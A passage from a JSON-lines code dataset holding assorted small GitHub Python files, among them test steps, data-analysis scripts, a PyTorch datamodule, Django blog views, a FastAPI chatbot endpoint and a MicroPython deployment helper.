5')\r\ndef step_impl(context):\r\n text_input_field = by_css(context, 'input#number')\r\n text_input_field.click()\r\n text_input_field.clear()\r\n text_input_field.send_keys('5')\r\n sleep(5)\r\n\r\n\r\n@given(u'UI: Click Calculate')\r\ndef click_calculate(context):\r\n button_calculate = by_css(context, 'button#getFactorial')\r\n button_calculate.click()\r\n sleep(5)\r\n\r\n\r\n@step('Verify the factorial of (?P.+) is (?P.+)')\r\ndef verify_result(context, value, result):\r\n ui_result = by_css(context, 'p#resultDiv')\r\n factorial_value = factorialtest(value)\r\n\r\n assert result in ui_result.text\r\n assert str(factorial_value) in ui_result.text\r\n\r\n\r\n","repo_name":"luckyvasul21/cameramatics-repo","sub_path":"features/steps/try.py","file_name":"try.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4226489555","text":"Planet_name = ['Mercury', 'Venus', 'Earth', 'Mars',\n 'Jupiter', 'Saturn', 'Uranus', 'Neptune']\n\nprint(Planet_name)\n\nPlanet_inp = input(\"Please enter a planets name \")\n\nif Planet_inp in Planet_name[0:2]:\n print(\"You're in the inner planet.\")\n\nelif Planet_inp == Planet_name[2]:\n print(\"You're on Planet Earth.\")\n\nelse:\n print(\"You're in the outer planet\")\n","repo_name":"Tushargohel/Assignment_py","sub_path":"Assignment2/P6_A2.py","file_name":"P6_A2.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27588413349","text":"import pandas as pd\nimport csv\n\n# read and import all csv files using pandas\nyearlystats = pd.read_csv(\"yearlydata/2019.csv\")\nweeks = [\"weeklydata/2019/week1.csv\", \"weeklydata/2019/week2.csv\", \"weeklydata/2019/week3.csv\", \"weeklydata/2019/week4.csv\", \"weeklydata/2019/week5.csv\", \"weeklydata/2019/week6.csv\", \"weeklydata/2019/week7.csv\", \"weeklydata/2019/week8.csv\", \"weeklydata/2019/week9.csv\", \"weeklydata/2019/week10.csv\", \"weeklydata/2019/week11.csv\", \"weeklydata/2019/week12.csv\", \"weeklydata/2019/week13.csv\", \"weeklydata/2019/week14.csv\", \"weeklydata/2019/week15.csv\", \"weeklydata/2019/week16.csv\", \"weeklydata/2019/week17.csv\"]\n\nplayerprofiles = []\n\n# iterate through every player that scored that year\nfor i in range(len(yearlystats)): \n # pull player name and yearly average from that file\n playername = yearlystats[\"Player 
Name\"][i]\n gamesplayed = yearlystats[\"Games Played\"][i]\n yearlyaverage = yearlystats[\"Average Fantasy Points\"][i]\n\n profile = [playername]\n\n xdata = []\n ydata = []\n\n # iterate through every weekly data file to find weeks where the selected player scored points\n for file in range(len(weeks)):\n with open(weeks[file], \"r\") as f:\n weeklystats = pd.read_csv(f)\n\n # calculate their +/- from their yearly average and pull the opposing team's rank\n for k in range(len(weeklystats)):\n if playername == weeklystats[\"Player Name\"][k]:\n points = (weeklystats[\"Total Fantasy Points\"][k]) - yearlyaverage\n oppteam = weeklystats[\"Opposing Team Rank\"][k]\n\n xdata.append(oppteam)\n ydata.append(points)\n\n profile.append(round(points, 2))\n profile.append(oppteam)\n \n # find the correlation between opposing team rank and fantasy +/-\n x = pd.Series(xdata)\n y = pd.Series(ydata)\n correlation = x.corr(y)\n\n profile.insert(1, gamesplayed)\n profile.insert(2, round(correlation, 2))\n playerprofiles.append(profile)\n\n # create new file with the correlation coefficient and the data from all the games they played (game number does not mean week number)\n with open(\"correlations/2019correlations.csv\", \"w\") as f:\n writer = csv.writer(f)\n\n headers = [\"Player Name\", \"Games Played\", \"Correlation\", \"G1P\", \"G1DR\", \"G2P\", \"G2DR\", \"G3P\", \"G3DR\", \"G4P\", \"G4DR\", \"G5P\", \"G5DR\", \"G6P\", \"G6DR\", \"G7P\", \"G7DR\", \"G8P\", \"G8DR\", \"G9P\", \"G9DR\", \"G10P\", \"G10DR\", \"G11P\", \"G11DR\", \"G12P\", \"G12DR\", \"G13P\", \"G13DR\", \"G14P\", \"G14DR\", \"G15P\", \"G15DR\", \"G16P\", \"G16DR\", \"G17P\", \"G17DR\"]\n writer.writerow(headers)\n writer.writerows(playerprofiles)","repo_name":"dketter24/fantasy-football","sub_path":"correlations.py","file_name":"correlations.py","file_ext":"py","file_size_in_byte":2545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"73703057832","text":"from pathlib import Path\nfrom typing import Optional, Union\n\nfrom pytorch_lightning import LightningDataModule\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms\nfrom torchvision.datasets import MNIST\nfrom torchvision.transforms.transforms import Lambda\n\n\nclass MyDataModule(LightningDataModule):\n def __init__(\n self,\n *,\n image_size: int,\n batch_size: int,\n num_workers: int,\n data_dir: Union[str, Path] = 'data',\n pin_memory: bool = True,\n **_\n ):\n super().__init__()\n\n self.data_dir = data_dir if isinstance(data_dir, Path) else Path(data_dir)\n self.batch_size = batch_size\n self.num_workers = num_workers\n self.pin_memory = pin_memory\n\n self.transform = transforms.Compose(\n [\n transforms.Resize(image_size),\n transforms.ToTensor(),\n transforms.Lambda(lambda x: x[0:1]),\n # transforms.Normalize(0.5, 0.5),\n ]\n )\n return\n\n @property\n def num_classes(self) -> int:\n return 10\n\n @property\n def channels(self) -> int:\n return 1\n\n def prepare_data(self) -> None:\n \"\"\"Download data if needed. 
This method is called only from a single GPU.\n        Do not use it to assign state (self.x = y).\"\"\"\n        MNIST(\n            root=str(self.data_dir / ''),\n            train=True,\n            download=True,\n            transform=self.transform,\n        )\n        MNIST(\n            root=str(self.data_dir / ''),\n            train=False,\n            download=True,\n            transform=self.transform,\n        )\n        return\n\n    def setup(self, stage: Optional[str] = None) -> None:\n        assert stage is None or stage in ['fit', 'test'], stage\n        self.data_train = MNIST(\n            str(self.data_dir), train=True, transform=self.transform\n        )\n        self.data_val = MNIST(str(self.data_dir), train=False, transform=self.transform)\n        return\n\n    def train_dataloader(self):\n        dataloader = DataLoader(\n            dataset=self.data_train,\n            batch_size=self.batch_size,\n            num_workers=self.num_workers,\n            pin_memory=self.pin_memory,\n            shuffle=True,\n            drop_last=True,\n        )\n        return dataloader\n\n    def val_dataloader(self):\n        dataloader = DataLoader(\n            dataset=self.data_val,\n            batch_size=self.batch_size,\n            num_workers=self.num_workers,\n            pin_memory=self.pin_memory,\n            shuffle=False,\n        )\n        return dataloader\n\n    # def test_dataloader(self):\n    #     return DataLoader(\n    #         dataset=self.data_test,\n    #         batch_size=self.batch_size,\n    #         num_workers=self.num_workers,\n    #         pin_memory=self.pin_memory,\n    #         shuffle=False,\n    #     )\n\n\nif __name__ == '__main__':\n\n    image_size = 32\n    batch_size = 64\n    num_workers = 4\n\n    datamodule = MyDataModule(\n        image_size=image_size,\n        batch_size=batch_size,\n        num_workers=num_workers,\n    )\n\n    datamodule.prepare_data()\n    datamodule.setup()\n","repo_name":"Kkun84/VAE_MNIST","sub_path":"lightning_module/data_module.py","file_name":"data_module.py","file_ext":"py","file_size_in_byte":3167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28947573416","text":"import random\n# import pandas\n\nlist_numbers = [1, 3, 5, 6, 78, 3, 5, 55]\nnew_list = [n + 10 for n in list_numbers]\n# print(new_list)\n\nnames = \"Shashi\"\nnew_names = [(name, f\"{name}name\") for name in names]\n# print(new_names)\n\nnew_range_value = [item * 2 for item in range(1, 5)]\n# print(new_range_value)\n\nlist_of_random_numbers = [random.randint(1, 100) for number in range(1, 10)]\n# print(list_of_random_numbers)\n\neven_numbers = [even_number for even_number in list_of_random_numbers if even_number % 2 == 0]\n# print(even_numbers)\n\n# file_one_data = pandas.read_csv('file1.txt')\n# print(file_one_data)\n\nstripped_numbers = []\nstripped_numbers_two = []\nwith open('file1.txt', 'r') as file_one:\n    list_numbers = file_one.readlines()\n    for item in list_numbers:\n        stripped_numbers.append(int(item.strip()))\n\nwith open('file2.txt', 'r') as file_two:\n    numbers = file_two.readlines()\n    for item in numbers:\n        stripped_numbers_two.append(int(item.strip()))\n\n\nprint(len(stripped_numbers), len(stripped_numbers_two))\n\n# for index, item in enumerate(stripped_numbers):\n#     if item in stripped_numbers_two:\n#         common_items.append(item)\n\ncommon_items = [item for item in stripped_numbers if item in stripped_numbers_two]\n\nprint(common_items)\n","repo_name":"shashidev091/learnToRockPython","sub_path":"reLearning/Inremediate_python/list_comprehension.py","file_name":"list_comprehension.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"929660437","text":"from odoo import _, fields, models\n\n\nclass DocumentType(models.Model):\n\n    _name = \"tmc.document_type\"\n    _description = \"Document Type\"\n\n    name = 
fields.Char(string=\"Document Type\")\n\n abbreviation = fields.Char(required=True)\n\n model = fields.Char(required=True)\n\n _sql_constraints = [\n (\n \"name_unique\",\n \"UNIQUE(name)\",\n _(\"Document type name must be unique\"),\n ),\n (\n \"abbreviation_unique\",\n \"UNIQUE(abbreviation)\",\n _(\"Document type abbreviation must be unique\"),\n ),\n ]\n","repo_name":"tmcrosario/odoo-tmc","sub_path":"tmc/models/document_type.py","file_name":"document_type.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"26575340432","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render,get_object_or_404,redirect\nfrom .models import BlogPost,BlogComment,BlogStats\nfrom django.core.paginator import Paginator\nfrom services.models import BlogPost as fbp\nfrom cart.models import session\nfrom django.db import IntegrityError\n\n################# DETAIL Blog##############\n\ndef Blog_Post_Detail_Page(request,post_id):\n obj = get_object_or_404(BlogPost, id=post_id)\n com_obj = BlogComment.objects.filter(Blog=obj)\n paginator = Paginator(com_obj, 5)\n page = request.GET.get('page')\n comments = paginator.get_page(page)\n template_name='services-detail.html'\n ## view ###\n if not request.user.is_anonymous:\n query_visit=BlogStats.objects.filter(blog=obj,user=request.user)\n if query_visit.count()==0:\n obj.views+=1\n obj.save()\n BlogStats(blog=obj,user=request.user,views=1).save()\n context={\"Blog\":obj,\"title\":\"Detail\",\"comments\":comments}\n return render(request,template_name,context)\n\n################# CREATE BLOG ##############\n@login_required(login_url='/login/accounts/login')\ndef Blog_Post_Create_Page(request):\n if request.POST or request.FILES:\n title = request.POST.get('title')\n content = request.POST.get('content')\n pr = request.POST.get('priority')\n if request.FILES:\n image = request.FILES['image']\n # save ima\n # s3.upload_file(image.read(), BUCKET, image.name)\n # fs = FileSystemStorage()\n # mi = fs.save(image.name, image)\n BlogPost(title=title,priority=pr,content=content,images=image,user=request.user).save()\n else:\n BlogPost(user=request.user,title=title,priority=pr,content=content).save()\n return redirect('/services/')\n template_name=\"create.html\"\n context = {}\n return render(request,template_name,context)\n\n################# LIST BLOG ################\n\ndef Blog_Post_List_Page(request):\n objs = BlogPost.objects.order_by('posted_time')[::-1]\n paginator = Paginator(objs, 5)\n template_name=\"services.html\"\n page = request.GET.get('page')\n blogs = paginator.get_page(page)\n context = {\"objects\":blogs}\n return render(request,template_name,context)\n\n############## New Comment ##########\n@login_required(login_url='/login/accounts/login')\ndef Create_Comment(request,post_id):\n if request.POST:\n newComment = BlogComment(user = request.user, Comment = request.POST['comment'],\n Blog_id=post_id)\n newComment.save()\n return redirect(\"/services/\"+post_id+\"/\")\n template_name = \"blog/create_comment.html\"\n context={}\n return render(request,template_name,context)\n\n############### Edit Comment #########\n@login_required(login_url='/login/accounts/login')\ndef Edit_Comment(request,comment_id):\n comment = get_object_or_404(BlogComment,id= comment_id)\n blog = comment.Blog\n if request.POST:\n comment.Comment = request.POST[\"edited_comment\"]\n comment.save()\n return 
redirect(\"/services/\"+str(blog.slug)+\"/\")\n template_name = \"blog/edit_comment.html\"\n context = {\"comment_to_edit\":comment.Comment}\n return render(request,template_name,context)\n\n############## Comment Delete ###############\n@login_required(login_url='/login/accounts/login')\ndef Delete_Comment(request,comment_id):\n comment = get_object_or_404(BlogComment,id= comment_id)\n blog = comment.Blog\n if request.POST:\n comment.delete()\n return redirect(\"/services/\"+str(blog.slug)+\"/\")\n template_name = \"blog/delete_comment.html\"\n return render(request,template_name)\n\n\n############# BLOG UPVOTE ###############\n@login_required(login_url='/login/accounts/login')\ndef Blog_Like(request,post_id):\n from_blog=get_object_or_404(BlogPost,id=post_id)\n a=get_object_or_404(BlogStats,blog=from_blog,user=request.user)\n if a.rating==1:\n from_blog.votes -=1\n from_blog.save()\n a.rating =0\n a.save()\n elif a.rating==0:\n from_blog.votes +=1\n from_blog.save()\n a.rating =1\n a.save()\n return redirect(\"/services/\"+str(from_blog.id)+\"/\")\n\n\n############# Donate ############\n@login_required(login_url='/login/accounts/login')\ndef Donate(request):\n template = \"blog/donate.html\"\n prev=0\n if request.POST:\n try:\n a=fbp.objects.create(title=\"donate\")\n session.objects.create(user=request.user, name=a,rate=request.POST.get(\"money\"))\n return redirect(\"/cart/\")\n except IntegrityError:\n a=fbp.objects.get(title=\"donate\")\n prev=a.value\n a.delete()\n a=fbp.objects.create(title=\"donate\")\n session.objects.create(user=request.user, name=a,rate=request.POST.get(\"money\"))\n return redirect(\"/cart/\")\n context = {\"pre_val\":prev}\n return render(request,template,context)","repo_name":"power88w/helpdesk","sub_path":"services/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4982,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14635928845","text":"import itertools\n\ndef detect_ranges(L):\n cL = L.copy()\n cL.sort()\n def aux(L):\n for i, j in itertools.groupby(enumerate(L), lambda x: x[1] - x[0]):\n j = list(j)\n start = j[0][1]\n length = len(j)\n\n if length == 1:\n yield start\n else:\n yield (start, start+length)\n return list(aux(cL))\n\ndef main():\n L = [4, 2, 0, -2, -4]\n print(L)\n result = detect_ranges(L)\n print(result)\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"EdCarlosBicudo/UH-Data_analysis_with_Python","sub_path":"hy-data-analysis-with-python-summer-2021/part01-e10_detect_ranges/src/detect_ranges.py","file_name":"detect_ranges.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"48131299","text":"import json\nimport urlparse\n\nimport pytest\n\n\ndef get_hosts(source_data, skip_hosts=None):\n skip_hosts = skip_hosts or []\n hosts = []\n if isinstance(source_data, list):\n hosts = [source_data[0]]\n elif isinstance(source_data, dict):\n grouped_hosts = source_data[\"Hosts\"]\n instances = [weighted_instances.strip(\"()\").split(\"@\")[0] for weighted_instances in grouped_hosts.split()]\n instances = [\"//{}\".format(instance) if \"://\" not in instance else instance for instance in instances]\n hosts = [urlparse.urlparse(instance).hostname for instance in instances]\n hosts = filter(lambda x: x not in skip_hosts, hosts)\n return hosts\n\n\n@pytest.mark.request\n@pytest.mark.config\ndef test_source_host_in_cache(source_data, dnscache):\n hosts = 
get_hosts(source_data, skip_hosts=['localhost'])\n assert set(hosts) <= set(dnscache), \\\n \"Source has unresolved host: '{}'\".format(set(hosts) - set(dnscache))\n\n\n@pytest.mark.request\n@pytest.mark.config\ndef test_source_empty(source_data):\n hosts = get_hosts(source_data)\n assert bool(set(hosts)), \"Source has no hosts\"\n\n\ndef pytest_generate_tests(metafunc):\n conf_file = metafunc.config.option.config\n config = json.load(open(conf_file))\n dnscache_hosts = [item.split(\"=\")[0] for item in config[\"_DNSCACHE_\"]]\n sources = [(name, value) for name, value in config.items() if not name.startswith(\"_\")]\n if 'source_data' in metafunc.fixturenames:\n metafunc.parametrize(\"source_data\", [item[1] for item in sources], ids=[item[0] for item in sources])\n if 'dnscache' in metafunc.fixturenames:\n metafunc.parametrize(\"dnscache\", [dnscache_hosts])\n\n\n@pytest.mark.request\n@pytest.mark.config\ndef test_metainfo(pytestconfig):\n conf_file = pytestconfig.option.config\n config = json.load(open(conf_file))\n metainfo = config[\"_METAINFO_\"]\n assert metainfo[\"version\"] != 'undefined', \"version should be defined\"\n assert metainfo[\"sandbox_task\"].isdigit(), \"sandbox_task should be digit\"\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"Search engine/runtime_tests/configuration/tests/test_request_config.py","file_name":"test_request_config.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42130440275","text":"import pytest\nfrom selenium.webdriver.android.webdriver import WebDriver\n\nfrom UI_tests_aut.main.read_data.properties.read_properties import PropertiesReader\nfrom UI_tests_aut.test.base.test_case_base import TestCaseBase\n\n\n@pytest.mark.skipif(PropertiesReader.if_save_running_time(), reason=\"Ignore test to save time running\")\n@pytest.mark.order(1)\n@pytest.mark.functional\nclass TestBrowserSession(TestCaseBase):\n\n def setup_class(self):\n self.driver: WebDriver = self.get_driver()\n self.url = PropertiesReader().load_properties_from_file('url').data\n\n def test_open(self):\n\n ''' implicit wait for all web-elements'''\n self.driver.implicitly_wait(2)\n self.driver.get(self.url)\n assert self.driver.current_url == 'https://www.saucedemo.com/'\n","repo_name":"DanielLepszy/PythonLearning","sub_path":"UI_tests_aut/test/pages/login_page_tests/test_open_browser.py","file_name":"test_open_browser.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70818155114","text":"import urequests as requests\nimport time\nimport machine\n\ntz_offset = -8 # PST\n\ndef set_time():\n # network must be up first\n r = requests.get('http://date.jsontest.com')\n mils = r.json()['milliseconds_since_epoch']\n r.close() # saw documentation says this must be done manually\n mils += tz_offset * 3600 * 1000 # timezone\n time_tuple = time.localtime(mils // 1000)\n time_tuple = time_tuple[0:3] + (0,) + time_tuple[3:6] + (0,)\n machine.RTC().datetime(time_tuple)\n \nif __name__ == '__main__':\n set_time()","repo_name":"Yossi/car-menora","sub_path":"micropython/set_time.py","file_name":"set_time.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"25856731047","text":"from taroc import JobInstances\nfrom tarocapp.model import JobInstancesModel\nfrom test.util import 
*\n\n\ndef test_add_jobs_update():\n # Given\n observed = 0\n\n def model_update(model, event):\n # Then:\n assert sut == model\n assert JobInstances([J1_2, J2_1]) == event.new_instances\n nonlocal observed\n observed += 1\n\n any_ = 3\n sut = JobInstancesModel(any_)\n sut.add_host_jobs('any', [J1_1])\n sut.observers.append(model_update)\n\n # When:\n sut.add_host_jobs('any', [J1_2, J2_1])\n\n # Then:\n assert observed == 1\n\n\ndef test_add_error_update():\n observed = 0\n\n def model_update(_, event):\n assert len(event.new_instances) == 0\n nonlocal observed\n observed += 1\n\n sut = JobInstancesModel(1)\n sut.observers.append(model_update)\n\n sut.add_host_error('any', None)\n\n assert observed == 1\n","repo_name":"StanSvec/taroc","sub_path":"test/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5263731948","text":"#!/usr/bin/env python3\n\nimport os\nimport subprocess\n\napidoc = subprocess.run(['./node_modules/.bin/jsdoc2md', '-d', '4', 'gaussian-analytics.js'],\n stdout=subprocess.PIPE).stdout.decode('utf8').splitlines()\n\nwith open('README.md') as f:\n readme = f.readlines()\n\nwith open('README.md', 'w') as f:\n in_apidoc = False\n for line in readme:\n if in_apidoc:\n if '## History' in line:\n in_apidoc = False\n if not in_apidoc:\n f.write(line)\n if '## API Documentation' in line:\n in_apidoc = True\n f.write(os.linesep)\n for apidoc_line in apidoc:\n f.write(apidoc_line + os.linesep)","repo_name":"luphord/gaussian-analytics","sub_path":"update-api-docs.py","file_name":"update-api-docs.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"6621054834","text":"from django.contrib import admin\nfrom django_audit_fields.admin import audit_fieldset_tuple\nfrom edc_form_label.form_label_modeladmin_mixin import FormLabelModelAdminMixin\nfrom edc_model_admin import SimpleHistoryAdmin\n\n\nfrom ...admin_site import inte_subject_admin\nfrom ...forms import HivInitialReviewForm\nfrom ...models import HivInitialReview\nfrom ..modeladmin import CrfModelAdminMixin\n\n\n@admin.register(HivInitialReview, site=inte_subject_admin)\nclass HivInitialReviewAdmin(\n CrfModelAdminMixin, FormLabelModelAdminMixin, SimpleHistoryAdmin\n):\n\n form = HivInitialReviewForm\n\n fieldsets = (\n (None, {\"fields\": (\"subject_visit\", \"report_datetime\")}),\n (\n None,\n {\n \"fields\": (\n \"diagnosis_date\",\n \"treatment_start_date\",\n \"treatment_start_date_estimated\",\n \"lifestyle_management\",\n \"on_treatment\",\n \"treatment\",\n ),\n },\n ),\n audit_fieldset_tuple,\n )\n\n filter_horizontal = (\"treatment\",)\n\n radio_fields = {\n \"lifestyle_management\": admin.VERTICAL,\n \"treatment_start_date_estimated\": admin.VERTICAL,\n \"on_treatment\": admin.VERTICAL,\n }\n","repo_name":"inte-africa-trial/inte-subject","sub_path":"inte_subject/admin/general_assessment/hiv_initial_review_admin.py","file_name":"hiv_initial_review_admin.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25733889600","text":"from models import Population\nfrom models import Citizen\nfrom utility import randint_bound, choice, rand\n\n\nclass PopulationGen(Population):\n def __init__(self, pop_size, best_pop, p_m):\n super().__init__(pop_size)\n self.best_pop = best_pop\n self.p_m 
= p_m\n\n def create_pop(self):\n return [Citizen() for _ in range(self.pop_size)]\n\n def make_crossover(self, pop=[]):\n children = []\n for _ in range(self.best_pop, self.pop_size):\n child = []\n if pop:\n p1, p2 = self.select_parents(len(pop))\n child = self.cross(pop[p1], pop[p2])\n else:\n p1, p2 = self.select_parents()\n child = self.cross(self.population[p1], self.population[p2])\n self.mutate(child)\n children.append(child)\n self.population = self.population[:self.best_pop] + children\n\n def cross(self, p1, p2):\n v_p1 = p1.get_values()\n v_p2 = p2.get_values()\n cut_p = randint_bound(1, 3)\n v_child = v_p1[:cut_p] + v_p2[cut_p:]\n return Citizen(v_child)\n\n def select_parents(self, len_pop=0):\n return choice(len_pop if len_pop else self.best_pop, 2)\n\n def mutate(self, citizen):\n if (rand() * 100) < self.p_m:\n pos = randint_bound(4)\n citizen.set_value(pos)\n\n def get_best_pop(self):\n return self.population[:self.best_pop]\n","repo_name":"ricmtz/Modular","sub_path":"evolutionary/pop_gen.py","file_name":"pop_gen.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17847834485","text":"from fastapi import FastAPI\nfrom pydantic import BaseModel\nimport uvicorn\nimport model as model\n\napp = FastAPI()\n\n\nclass Question(BaseModel):\n content: str\n\n\n@app.post(\"/ask\")\nasync def ask_question(question: Question):\n # use the model to get the answer\n answer = model.get_answer(question.content)\n\n return {\"answer\": answer}\n\n\n@app.get(\"/info\")\nasync def getInfo():\n return {\"info\": \"Use this API to ask Josh any question\"}\n\nif __name__ == '__main__':\n uvicorn.run('main:app', host='0.0.0.0', port=80)\n","repo_name":"joshhamwee/cv-chatbot","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"35545452089","text":"# 文字內容\ntext = '''人生短短幾個秋啊\n不醉不罷休\n東邊我的美人哪\n'''\n\n# 寫入檔案\nwith open(\"./8-2.txt\", \"w\", encoding=\"utf-8\") as f:\n f.write(text)\n\n# 寫入最後一行 (附加文字在檔案內容最後一行)\nwith open(\"./8-2.txt\", \"a\", encoding=\"utf-8\") as f:\n f.write(\"西邊黃河流\" + \"\\n\")","repo_name":"telunyang/python_basics","sub_path":"examples/8-2.py","file_name":"8-2.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"33735504323","text":"\nimport glob\nimport os\nimport re\nimport json\ncv_data={}\ntasks=[0,1,2,3]\nfor st in tasks:\n cv_data[st]={}\n print(\"[LOAD] result_st\"+str(st)+\"/info_cv.json\")\n obj=json.load(open(\"result_st\"+str(st)+\"/info_cv.json\"))\n for k,fold in enumerate(obj):\n ls=[int(l[0]) for l in fold[\"test_labels\"]]\n if isinstance(fold[\"prediction_data\"][0][0],list):\n preds=[1 if float(pred[0][0]) > 0.5 else 0 for pred in fold[\"prediction_data\"]]\n score=[float(pred[0][0]) for pred in fold[\"prediction_data\"]]\n else:\n preds=[1 if float(pred[0]) > 0.5 else 0 for pred in fold[\"prediction_data\"]]\n score=[float(pred[0]) for pred in fold[\"prediction_data\"]]\n cv_data[st][k]=list(zip(fold[\"test_data_idx\"],ls,preds,score))\n\ndata={}\nfor st in tasks:\n filelist=glob.glob(\"./viz_st\"+str(st)+\"/*.jbl\")\n for f in filelist:\n #./viz_mm/fold3_2351_task_0_inactive_all_scaling.jbl\n name=os.path.basename(f)\n name,_=os.path.splitext(name)\n arr=name.split(\"_\")\n fold_s=arr[0]\n idx=int(arr[1])\n 
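# Worked example, using the sample path from the comment above: a stem such as\n        # \"fold3_2351_task_0_inactive_all_scaling\" gives fold_s == \"fold3\" and idx == 2351,\n        # and the regex below recovers the fold number 3 from the \"fold\" prefix.\n        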
m=re.match(r\"fold([0-9]+)\",fold_s)\n if m:\n fold=int(m.group(1))\n if fold not in data:\n data[fold]=[]\n data[fold].append((idx,st,name))\n\nall_data=[]\nfor k,v in data.items():\n for el in v:\n idx=el[0]\n task=el[1]\n name=el[2]\n org_idx_pair=cv_data[task][k][idx]\n org_idx=org_idx_pair[0]\n l=org_idx_pair[1]\n pred=org_idx_pair[2]\n score=org_idx_pair[3]\n #all_data.append((org_idx,k,el[0],el[1],el[2]))\n all_data.append((org_idx,task,l,pred,score,k,idx,name))\n print(k,len(v))\n\nindex_data={}\nfor line in open(\"multimodal_data_index.csv\"):\n arr=line.strip().split(\",\")\n index_data[int(arr[0])]=arr[2]\n#print(index_data)\n\nprint(len(all_data))\nfp=open(\"summary_viz_st.tsv\",\"w\")\ns1=\"\\t\".join([\"compound ID\",\"task ID\",\"SMILES\",\"label\",\"prediction\",\"score\",\"fold ID\",\"fold index\",\"visualization filename\"])\nfp.write(s1)\nfp.write(\"\\n\")\nfor el in sorted(all_data):\n print(el)\n s1=\"\\t\".join(map(str,el[0:2]))\n s2=\"\\t\".join(map(str,el[2:]))\n smi=index_data[el[0]]\n fp.write(s1+\"\\t\"+smi+\"\\t\"+s2)\n fp.write(\"\\n\")\n\n","repo_name":"clinfo/kGCN","sub_path":"sample_chem/compound-protein_interaction/summarize_viz_st.py","file_name":"summarize_viz_st.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","stars":106,"dataset":"github-code","pt":"72"} +{"seq_id":"71750088234","text":"#!/usr/bin/env python\n\nimport os\nimport subprocess\nimport time\n\nimport util.opt_parser as parser\nfrom util.toolkit import log, check_executable_exists, check_file_exists, properties, \\\n get_modified_files, execute_shell_command, execute_shell_command_get_output, read_file_to_list, \\\n check_folder_exists, remove_files_by_ext_recursively,timestamp_to_human_readable, \\\n get_subdirectory_structure_by_filelist, die\n\ntimestamp = 0\ntimestamp_file = parser.options.path + properties.osDirSeparator + properties.timeStampFilename\nskip_files = []\nstart_time = time.time()\n\nif parser.options.path == os.getcwd() and (parser.options.install or parser.options.skip or parser.options.profile):\n die(\"You tried to run espedite from within its own folder. Please cd to your code folder instead and run it from there.\")\n\n# Remove any compiled files\nremove_files_by_ext_recursively(parser.options.path, properties.binaryCodeExtension)\n\n# Read timestamp\nif check_file_exists(timestamp_file):\n with open(timestamp_file, 'r') as f:\n timestamp = f.readline().strip()\n log.debug(\"Last execution was on {} (UNIX Timestamp: {}) \".format(timestamp_to_human_readable(timestamp), str(timestamp)))\n\nlog.info(\"Running script in path '{}'\". 
format(parser.options.path))\n\ncheck_executable_exists(\"ampy\", True)\nif parser.options.connect:\n check_executable_exists(\"picocom\", True)\n\nmodified_relative_files = get_modified_files(parser.options.path, timestamp, True)\n\nif parser.options.skip:\n # READ SKIPFILE\n log.info(\"Reading skip file '{}' ....\".format(parser.options.skip))\n skip_files = read_file_to_list(parser.options.path + properties.osDirSeparator + parser.options.skip)\n\nif parser.options.uninstall:\n # UNINSTALL\n log.info(\"Uninstalling ....\")\n\n installed_files = execute_shell_command_get_output(\"sudo ampy --port /dev/ttyUSB0 ls /\").split(\"\\n\")\n\n for f in installed_files:\n # ampy returns an empty string at the end so skip that\n if f == \"\":\n continue\n log.info(\"Removing file or folder '{}' ....\".format(f))\n execute_shell_command(\"sudo ampy --port /dev/ttyUSB0 rmdir {}\".format(f), stderr=subprocess.PIPE)\n execute_shell_command(\"sudo ampy --port /dev/ttyUSB0 rm {}\".format(f), stderr=subprocess.PIPE)\n\n # Remove timestamp file\n try:\n os.remove(timestamp_file)\n log.info(\"Removing timestamp file '{}' ....\".format(timestamp_file))\n except OSError:\n pass\n\n log.info(\"Uninstallation complete ....\")\n\nif modified_relative_files and parser.options.install:\n # print(get_subdirectory_structure(parser.options.path))\n\n if parser.options.compile:\n # COMPILE\n log.info(\"Compiling ....\")\n\n if not check_folder_exists(os.getcwd() + properties.osDirSeparator + \"micropython\"):\n log.debug(\"Compiling the compiler ...\"),\n pushd = os.getcwd()\n execute_shell_command(\"git clone 